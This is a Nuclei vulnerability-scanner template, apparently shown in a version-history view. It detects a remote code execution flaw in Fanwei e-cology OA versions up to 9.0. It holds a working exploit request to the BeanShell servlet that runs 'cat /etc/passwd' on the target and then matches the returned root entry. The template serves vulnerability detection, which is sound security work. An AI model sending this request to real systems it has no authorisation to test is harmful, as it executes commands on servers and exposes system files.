nuclei-templates/http/cnvd/2019/CNVD-2019-32204.yaml

33 lines
1.3 KiB
YAML
Raw Normal View History

2022-02-20 12:52:06 +00:00
id: CNVD-2019-32204
info:
name: Fanwei e-cology <=9.0 - Remote Code Execution
2022-02-20 12:52:06 +00:00
author: daffainfo
severity: critical
description: Fanwei e-cology <=9.0 is susceptible to remote code execution vulnerabilities. Remote attackers can directly execute arbitrary commands on the target server by invoking the unauthorized access problem interface in the BeanShell component. Currently, the security patch for this vulnerability has been released. Please take protective measures as soon as possible for users who use the Fanwei e-cology OA system.
reference:
- https://blog.actorsfit.com/a?ID=01500-11a2f7e6-54b0-4a40-9a79-5c56dc6ebd51
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
2023-10-14 11:27:55 +00:00
cvss-score: 10
cwe-id: CWE-77
metadata:
max-request: 1
2024-01-14 09:21:50 +00:00
tags: cnvd,cnvd2019,fanwei,rce
2022-02-20 12:52:06 +00:00
http:
2022-02-20 12:52:06 +00:00
- raw:
- |
POST /bsh.servlet.BshServlet HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
bsh.script=exec("cat+/etc/passwd");&bsh.servlet.output=raw
matchers:
- type: regex
regex:
2023-10-14 11:27:55 +00:00
- "root:.*:0:0:"
# digest: 4a0a0047304502200737b4766489cce5eaac9a1fd6d4b2456c8c259c3dc6591e5fbfe2cc53c11225022100e120e0d0a615037c438d21401935982b49b4f718cb823da8dedbd2efb34cd385:922c64590222798bb761d5b6d8e72950